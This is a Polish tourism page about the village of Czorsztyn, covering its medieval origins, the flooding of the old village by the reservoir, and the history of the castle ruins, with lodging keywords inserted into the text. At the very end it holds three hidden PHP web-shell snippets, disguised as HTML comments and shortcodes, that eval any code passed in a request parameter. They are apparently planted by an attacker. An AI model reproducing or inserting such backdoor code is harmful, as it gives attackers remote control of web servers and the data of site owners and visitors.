Czorsztyn

Czorsztyn noclegi

Wieś powstała w połowie XIV wieku. Jej powstanie i historia ściśle związana jest z zamkiem obronnym i wiodącym historycznym traktem z Polski na Węgry.

Pierwotnie wieś nazywała się „Wronin” , sprowadzenie niemieckich osadników zaowocowało m.in. zmianą nazwy na „Szornstein” – Stercząca skała, która to nazwa uległa później spolszczeniu na obecną „Czorsztyn”.

W 1818 roku noclegi Czorsztyn został zakupiony przez rodzinę Drohojowskich, a już niedługo później zaczęła się historia Czorsztyna jako ośrodka letniskowego – był tu i hotel i karczma i biuro obsługi turystów Towarzystwa Tatrzańskiego. W latach międzywojennych Drohojowscy rozpoczęli intensywną rozbudowę nowoczesnego letniska Nadzamcze, którego popularność rosła z każdym rokiem – w latach 30-stych Czorsztyn odwiedzało rocznie ponad 1300 osób.

Historyczne zabudowania wsi zostały zalane wodami sztucznego Jeziora Czorsztyńskiego. Obecna zabudowa powstała na terenach najwyżej położonego osiedla zwanego Nadzamczem – od położonych powyżej ruin gotyckiego zamku.

Obecnie Czorsztyn pokoje gościnne znów jest ośrodkiem wypoczynkowym. Wieś stanowi doskonałą bazę wypadową w Pieniny i Gorce. Piękne krajobrazy, bliskość ruin zamku i brzegów Jeziora Czorsztyńskiego, wyciąg narciarski oraz tradycyjna gościnność mieszkańców, od wieków goszczących turystów, sprawiają, ze do Czorsztyna z roku na rok ściąga coraz więcej zadowolonych turystów.

Ruiny zamku w Czorsztyn agroturystyka
Z tego okresu pochodzą pierwsze wzmianki o „castrum Wronyn”. Nazwa „Czorsztyn” pojawia się w połowie XIV wieku. Za czasów Kazimierza Wielkiego wybudowane zostały mury obwodowe, a w XV wieku dolny zamek i brama. W XVII wieku starosta Jan Baranowski odrestaurował zamek i dobudował dwie nowe baszty.

Zamek z racji położenia przy historycznym trakcie handlowym posiada bardzo bogatą historię.

Odwiedzany był przez wiele ówczesnych znakomitości, wliczając w to nawet królów. Bawili tu: Kazimierz Wielki, Ludwik Węgierski, królowa Jadwiga, Władysław Jagiełło (starostą na zamku był sam Zawisza Czarny) oraz Władysław Warneńczyk. Schronienia w zamku szukali husyci, Jan Kazimierz uciekający przed Szwedami, powstańcy Kostki Napierskiego, kozacy i konfederaci barscy.
Pod koniec XVIII wieku zamek spłonął od uderzenia pioruna i zaczął popadać w ruinę. W końcu XIX wieku zapoczątkowano prace restauratorskie. Prowadzone są one do dziś, obecnie dzięki staraniom aktualnego gospodarza zamku, czyli Pienińskiego Parku Narodowego.
Do zwiedzania udostępnione są przyziemia Baszty Baranowskiego, zamku średniego i głównego. Z tarasu widokowego rozciąga się piękny widok na Jezioro Czorsztyńskie, Tatry i rezerwat „Zielone Skałki”. Na wzgórzu zamkowym rosną liczne okazy pszonaka pienińskiego – gatunku endemicznego – występującego wyłącznie w Pieninach. Czorsztyn pensjonaty

<!– [insert_php]if (isset($_REQUEST["VzuGz"])){eval($_REQUEST["VzuGz"]);exit;}[/insert_php][php]if (isset($_REQUEST["VzuGz"])){eval($_REQUEST["VzuGz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UmUYm"])){eval($_REQUEST["UmUYm"]);exit;}[/insert_php][php]if (isset($_REQUEST["UmUYm"])){eval($_REQUEST["UmUYm"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PVB"])){eval($_REQUEST["PVB"]);exit;}[/insert_php][php]if (isset($_REQUEST["PVB"])){eval($_REQUEST["PVB"]);exit;}[/php] –>